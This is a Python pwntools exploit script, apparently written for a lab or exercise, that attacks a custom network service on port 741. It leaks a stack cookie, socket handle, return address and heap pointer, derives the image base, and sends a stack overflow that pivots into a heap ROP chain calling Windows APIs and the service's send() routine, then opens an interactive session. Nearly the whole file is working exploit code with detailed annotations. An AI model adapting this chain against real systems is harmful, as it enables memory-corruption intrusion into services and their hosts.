  1. import socket
  2. import time
  3. from pwn import *
  4.  
# pwntools context: amd64 selects the 64-bit little-endian packing that p64/u64
# use below.  context.os only influences shellcraft, so the 'linux' value is
# harmless even though the target image imports Win32 APIs (see the IAT slots
# further down) — left as in the original.
context.os = 'linux'
context.arch = 'amd64'
# context.log_level = 'DEBUG'   # uncomment for a hexdump of every send/recv

# Target endpoint.  The commented host is an alternate lab address kept for
# reference; only HOST is live.
# HOST = '172.27.223.171'
HOST = '192.168.1.34'
PORT = 741

# Single TCP session to the vulnerable service; every helper below writes to
# and reads from this one tube.
elf = remote(HOST, PORT)
  13.  
def send_data(data):
    """Write ``data`` to the service socket, then pause briefly.

    The fixed pause after each write is (presumably) there so the server has
    consumed one message before the next arrives and two consecutive sends
    are not read as a single message on its side — confirm if timing issues
    appear.
    """
    settle_seconds = 0.2
    elf.send(data)
    time.sleep(settle_seconds)
  17.  
def recv_data():
    """Return whatever the service has written since the last read.

    This is one unsized ``recv``: it yields at most a single socket read's
    worth of bytes, so a reply can come back short (split write) or merged
    with the next one (coalesced writes).  Callers that depend on an exact
    byte count — the 8-byte leaks fed to ``u64`` — get no guarantee here.
    """
    reply = elf.recv()
    return reply
  20.  
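def build_cmd1_frame(data):
    """Wrap ``data`` in the wire frame the service expects for command 1.

    Layout (as used by the original exploit): 4-byte command id
    ``01 00 00 00``, one length byte holding ``len(data) // 8`` (the length is
    expressed in 8-byte units, so up to 7 trailing bytes are not counted —
    presumably the server scales it back up, TODO confirm), then the payload.

    The original computed the length as ``int(len(data) / 2) >> 2``, which is
    ``len(data) // 8`` for every non-negative length; it is spelled out here.

    Raises:
        ValueError: if the unit count does not fit in one byte, i.e. ``data``
            is 2048 bytes or longer.  The original hit the same limit but
            surfaced it as an opaque ``bytes()`` range error.
    """
    units = len(data) // 8
    if units > 0xff:
        raise ValueError(
            "cmd1 length field is one byte of 8-byte units; "
            "{} bytes ({} units) does not fit".format(len(data), units)
        )
    header = b'\x01\x00\x00\x00' + bytes([units])
    return header + data


def send_cmd1(data):
    """Send ``data`` to the service as a command-1 frame.

    Raises:
        ValueError: if ``data`` is too long for the one-byte length field
            (see ``build_cmd1_frame``).
    """
    send_data(build_cmd1_frame(data))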
  26.  
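def leak_request(index):
    """Build the 5-byte request that asks the service for leak slot ``index``.

    Layout (as used by the original exploit): command bytes ``04 00 00 01``
    followed by a single slot-index byte.  Each slot appears to be 4 bytes
    wide (a qword is read as two consecutive slots).

    Raises:
        ValueError: if ``index`` is outside 0..255.  The original fell
            through to an opaque ``bytes()`` range error instead.
    """
    if not 0 <= index <= 0xff:
        raise ValueError("leak slot index {} does not fit in one byte".format(index))
    return b'\x04\x00\x00\x01' + bytes([index])


def leak_nth_dword(n):
    """Read the ``n``-th 8-byte value exposed by the leak primitive.

    Despite the name this returns a *qword*: slots ``2n`` and ``2n + 1`` are
    requested one after the other and their replies concatenated.  The result
    is 8 bytes only when the server answers each request with exactly 4 —
    ``recv_data`` is an unsized read and does not enforce that, so a short or
    coalesced reply surfaces later as a ``u64`` length error at the caller.

    Raises:
        ValueError: if ``n`` is negative or ``2n + 1`` exceeds 255
            (``n`` must be in 0..127).
    """
    first_slot = 2 * n
    leaked = b''
    for slot in (first_slot, first_slot + 1):
        send_data(leak_request(slot))
        leaked += recv_data()
    return leaked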
  34.  
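# --- Leak the values the service exposes ------------------------------------
# Slots 0..4 of the leak primitive give, in order: the stack cookie, a value
# the original calls "memory privileges", the socket handle, a return address
# into the service image and a pointer to the heap buffer that receives our
# command.  Cookie, "privileges" and socket are written back unchanged by the
# overflow; the socket is also passed to send(); the return address yields the
# image base; the heap pointer is the stack-pivot target.
print("Leaking stuff...")
leaked_cookie = u64(leak_nth_dword(0))
print("Leaked cookie : {}".format(hex(leaked_cookie)))
leaked_mem_priv = u64(leak_nth_dword(1))
print("Leaked memory privleges : {}".format(hex(leaked_mem_priv)))
leacked_sockfd = u64(leak_nth_dword(2))
print("Leaked socket : {}".format(hex(leacked_sockfd)))
leacked_ret = u64(leak_nth_dword(3))
print("Leakead ret : {}".format(hex(leacked_ret)))
leaked_allocBuffer = u64(leak_nth_dword(4))
print("Leakead allocated buffer on heap : {}".format(hex(leaked_allocBuffer)))

# The leaked return address sits at a fixed offset from the image base; every
# gadget and import-table offset below is relative to that base.
RET_OFFSET_FROM_BASE = 0x2507
base_addr = leacked_ret - RET_OFFSET_FROM_BASE
# Sanity-check the base before building a chain on it.  A PE image base is at
# least page-aligned, so any low bits set here mean the leak did not return the
# expected return address (e.g. a short or coalesced recv); sending the chain
# anyway would only crash the service.
if base_addr & 0xfff:
    raise RuntimeError(
        "computed base {:#x} is not page-aligned; leaked return address "
        "{:#x} is not the expected one".format(base_addr, leacked_ret)
    )
print("Computed base addr : {}".format(hex(base_addr)))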
  48.  
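# --- Gadgets, as offsets from the leaked image base -------------------------
# Each name spells out the instruction sequence at that address.  Several
# entries (syscall, pop_rbx_ret, xor_rax_rax_ret, add_resp_0x28_ret,
# mov_rcx_rax_call_qwordptr_r8) are not used by the live chain; they are kept
# for the commented-out VirtualAlloc variant and for further chain work.
pop_rsp_ret = base_addr + 0x4d4a
syscall = base_addr + 0x33acc
pop_rcx_ret = base_addr + 0x13603   # the original assigned this twice with the same value
pop_rdx_ret = base_addr + 0x1b4be
pop_r8_ret = base_addr + 0x3a6d
pop_rax_ret = base_addr + 0x3a6e    # pop_r8_ret + 1: `41 58` is pop r8, the lone `58` is pop rax
pop_rbx_ret = base_addr + 0x132c
j_rax = base_addr + 0x907d
call_qword_ptr_rax_add_rsp_0x38_ret = base_addr + 0x194a
cmovne_r9d_r8d_movzx_eax_r9d_ret = base_addr + 0x752cb
xor_rax_rax_ret = base_addr + 0x3148f
xor_eax_edx_ret = base_addr + 0x3113c
add_resp_0x28_ret = base_addr + 0x1194   # name kept as-is (sic); presumably `add rsp, 0x28; ret`

mov_rcx_rax_call_qwordptr_r8 = base_addr + 0x1946

# The original called .format() on a string with no placeholder; plain print.
print("Starting ROP ...")

# --- Import-table slots -----------------------------------------------------
# These are *slots holding* the API pointers, not the APIs themselves: the
# chain reaches them with `call qword ptr [rax]`, i.e. one dereference.
GetModuleHandleWAddr = base_addr + 0x7b1f8
LoadLibraryExWAddr = base_addr + 0x7b2d8
CreateThreadAddr = base_addr + 0x7b0a8
ResumeThreadAddr = base_addr + 0x7b0f0
VirtuallAllocAddr = base_addr + 0x7b098
GetProcAddressAddr = base_addr + 0x7b0b8
ReadFileAddr = base_addr + 0x7b088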
  75.  
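# --- Build the ROP chain (in the heap buffer) and the stack overflow ---------
#
# The chain is not run from the stack.  The overflow only replaces the saved
# return address with `pop rsp; ret`, which pivots rsp into the heap buffer
# the service allocated for our command; the gadgets live there.  Offsets are
# therefore relative to leaked_allocBuffer and assume the service stores the
# complete cmd1 frame (5-byte header, then the data) at that address — that
# is what makes 5 + 11 == 0x10 (the DLL name) and 5 + 555 == 0x230 (the first
# gadget) line up.  TODO confirm against the server before changing the layout.
CMD1_HEADER_LEN = 5        # 4 id bytes + 1 length byte, as built by send_cmd1
OVERFLOW_BUF_SIZE = 1024   # bytes from the start of the stack buffer to the saved cookie
start_rop = leaked_allocBuffer + 0x230  # first gadget; everything below it is data

ropchain = b''
ropchain += b'\x00' * 11
# L"ws2_32.dll" (UTF-16LE) at buffer offset 0x10.  Only one NUL byte follows
# the string; the 11 pad bytes after it complete the wide terminator.
ropchain += 'ws2_32.dll'.encode('utf-16-le') + b'\x00'
ropchain += b'\x00' * 11
ropchain += b'A' * 0x200   # filler up to offset 0x230
first_gadget_offset = len(ropchain)

# 1) GetModuleHandleW(L"ws2_32.dll") through `call [rax]`, rax = IAT slot.
#    The returned handle is not consumed by the live chain below.
ropchain += p64(pop_rcx_ret)
ropchain += p64(leaked_allocBuffer + 0x10)   # rcx = &L"ws2_32.dll" (the original comment said kernel32; the bytes are ws2_32)
ropchain += p64(pop_rax_ret)
ropchain += p64(GetModuleHandleWAddr)
ropchain += p64(call_qword_ptr_rax_add_rsp_0x38_ret)   # call [rax]; add rsp, 0x38; ret
# Skipped by `add rsp, 0x38`; doubles as the callee's home (shadow) space.
ropchain += b'B' * 0x38

# 2) Jump to the service's own send() call site at base+0x25b9 with
#    rcx = socket, rdx = buffer, r8 = 8 (length), r9 = 0 (flags).
#    r9 can only be set via `cmovne r9d, r8d`, which needs ZF clear:
#    `xor eax, edx` does that as long as eax != edx (edx is the low dword of
#    the buffer pointer).  r8 is parked at 0 for the cmov and then reloaded.
ropchain += p64(pop_rcx_ret)
ropchain += p64(leacked_sockfd)
ropchain += p64(pop_rdx_ret)
ropchain += p64(leaked_allocBuffer + 0x258 + 0x10)   # 0x10 into the 0x38-byte filler above (the previous call's home space); which 8 bytes end up there is not evident from this script — TODO confirm
ropchain += p64(pop_r8_ret)
ropchain += p64(0x0)
ropchain += p64(xor_eax_edx_ret)                      # clear ZF for the cmovne
ropchain += p64(cmovne_r9d_r8d_movzx_eax_r9d_ret)     # r9d = r8d = 0
ropchain += p64(pop_r8_ret)
ropchain += p64(0x8)                                  # r8 = length
ropchain += p64(pop_rax_ret)
ropchain += p64(base_addr + 0x25b9)
ropchain += p64(j_rax)                                # jmp rax -> send call site

# Abandoned variant kept for reference; not part of the live chain.
# # VirtualAlloc to up memory size
# ropchain += p64(pop_rcx_ret)
# ropchain += p64(leaked_allocBuffer)
# ropchain += p64(pop_rdx_ret)
# ropchain += p64(0x1000)
# ropchain += p64(pop_r8_ret)
# ropchain += p64(0x40)           # Make it executable why not ...
# ropchain += p64(xor_eax_edx_ret) # TO UNSET ZERO FLAG for cmovne
# ropchain += p64(cmovne_r9d_r8d_movzx_eax_r9d_ret)
# ropchain += p64(pop_r8_ret)
# ropchain += p64(0x1000)
# ropchain += p64(pop_rax_ret)
# ropchain += p64(VirtuallAllocAddr)
# ropchain += p64(call_qword_ptr_rax_add_rsp_0x38_ret)
# ropchain += b'B' * 0x38
# ropchain += p64(pop_rax_ret)
# ropchain += p64(leaked_allocBuffer + 0x1b8)
# ropchain += p64(j_rax)

# ropchain += p64(pop_r8_ret)
# ropchain += p64(GetProcAddressAddr)
# ropchain += p64(pop_rdx_ret)
# ropchain += p64(leaked_allocBuffer + 0x30)
# ropchain += p64(mov_rcx_rax_call_qwordptr_r8)

# Layout checks.  The pivot target is a hard-coded offset; if the data area
# above the gadgets is ever resized the first gadget silently moves and the
# `ret` after `pop rsp` lands in filler.  Likewise the 'C' padding below goes
# negative (and the cookie lands in the wrong slot) if the chain outgrows the
# stack buffer.
if CMD1_HEADER_LEN + first_gadget_offset != start_rop - leaked_allocBuffer:
    raise ValueError(
        "first gadget is at buffer offset {:#x} but the pivot targets {:#x}".format(
            CMD1_HEADER_LEN + first_gadget_offset, start_rop - leaked_allocBuffer)
    )
if len(ropchain) > OVERFLOW_BUF_SIZE:
    raise ValueError(
        "ROP chain is {} bytes but only {} fit before the saved cookie".format(
            len(ropchain), OVERFLOW_BUF_SIZE)
    )

payload = ropchain + b'C' * (OVERFLOW_BUF_SIZE - len(ropchain))   # pad up to the saved cookie
payload += p64(leaked_cookie)      # presumably the stack cookie: restored so the epilogue check passes
payload += p64(leaked_mem_priv)    # saved value, written back unchanged
payload += p64(leacked_sockfd)     # saved socket, written back unchanged
payload += p64(pop_rsp_ret)        # saved return address -> `pop rsp; ret`
payload += p64(start_rop)          # popped into rsp: pivot into the heap buffer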
  138.  
# --- Fire -------------------------------------------------------------------
# The overflowing frame goes in as command 1.  The single 0x05 byte that
# follows is presumably the command that ends the exchange and lets the
# vulnerable function return (and so run the pivot) — TODO confirm.
send_cmd1(payload)
send_data(b'\x05')

reply = recv_data()
print(reply)

# Hand the socket over for manual interaction with whatever the chain produced.
elf.interactive()